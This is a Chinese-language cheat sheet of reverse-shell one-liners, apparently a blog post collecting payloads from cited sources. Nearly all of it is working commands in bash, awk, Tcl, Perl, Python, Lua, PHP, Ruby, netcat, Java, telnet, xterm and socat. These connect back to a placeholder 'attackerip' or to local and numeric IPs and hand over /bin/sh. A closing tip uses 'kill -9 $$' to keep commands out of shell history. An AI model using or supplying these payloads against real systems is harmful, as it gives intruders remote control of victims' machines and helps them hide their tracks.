常用反弹shell备忘录

关键字

反弹shell, 命令执行, Remote Code Execution, Reverse Shell

其中有少部分正向shell

参考资料

http://hackerwing.com/2017/12/19/Reverse-Shell-%E5%A4%87%E5%BF%98%E5%BD%95/#more

me记录 来源于redflog1
linux下反弹shell命令
https://mp.weixin.qq.com/s?__biz=MzA5MDUwMzM1Nw==&mid=2652481055&idx=1&sn=1051ab4a1a377f457e9897ee0050cfa2&chksm=8be7a7cdbc902edb43c33b465d138f37b54922d3fb6af024486127adcb47d66d43dd52f435d8&mpshare=1&scene=1&srcid=1230iue9wT08KqVDdzZSE8dM#rd

正文

指令类

Bash

1
bash -i >& /dev/tcp/attackerip/8080 0>&1

其他

1

1
2
exec 5<>/dev/tcp/127.0.0.1/8080
cat <&5 | while read line; do $line 2>&5 >&5; done

2

1
exec 2>&0;0<&196;exec 196<>/dev/tcp/127.0.0.1/8080; sh <&196 >&196 2>&196

3

1
rm /tmp/backpipe;mknod /tmp/backpipe p;/bin/bash 0</tmp/backpipe | nc 127.0.0.1 8080 1>/tmp/backpipe

4

1
echo 'set s [socket 127.0.0.1 8080];while 42 { puts -nonewline $s "shell>";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | tclsh

5

1
awk 'BEGIN {s = "/inet/tcp/0/127.0.0.1/8080"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null

Perl

1
perl -e 'use `Socket;$i="attackerip";$p=5555;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'`


1
perl -e 'use Socket;$i="127.0.0.1";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'


1
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"127.0.0.1:8080");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

Python

1
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attackerip",5555));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Lua

1
lua -e "require('socket');require('os');t=socket.tcp();t:connect('127.0.0.1','8080');os.execute('/bin/sh -i <&3 >&3 2>&3');"

PHP

1
php -r '$sock=fsockopen("attackerip",5555);exec("/bin/sh -i <&3 >&3 2>&3");'

Ruby

1
ruby -rsocket -e'f=TCPSocket.open("attackerip",5555).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'


1
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("127.0.0.1","8080");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

Netcat

1
nc -e /bin/sh attackerip 5555

如果您安装了netcat的错误版本,您仍可以像这样获取您的反向shell:

1
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc attackerip 5555 >/tmp/f

其他

1
2
nc 127.0.0.1 8080 -c /bin/bash
nc 1.1.1.1 10086 -e /bin/sh

Java

1
2
3
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/attackerip/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Telnet

1
2
3
rm -f /tmp/p; mknod /tmp/p p && telnet attackerip 4444 0/tmp/p
Or:
telnet attackerip 4444 | /bin/bash | telnet attackerip 4445 # Remember to listen on your machine also on port 4445/tcp

另外

1
2
3
rm /tmp/backpipe;mknod /tmp/backpipe p && telnet 127.0.0.1 8080 0</tmp/backpipe | /bin/bash 1>/tmp/backpipe
或者
telnet 127.0.0.1 8080 | /bin/bash | telnet 192.168.149.133 9090

Xterm

1
xterm -display attackerip:1

Socat

1
socat tcp-connect:127.0.0.1:8080 exec:"bash -li",pty,stderr,setsid,sigint,sane

后记

Metasploit, 都是使用popen3函数实现 history肯定不会记录

1
kill -9 $$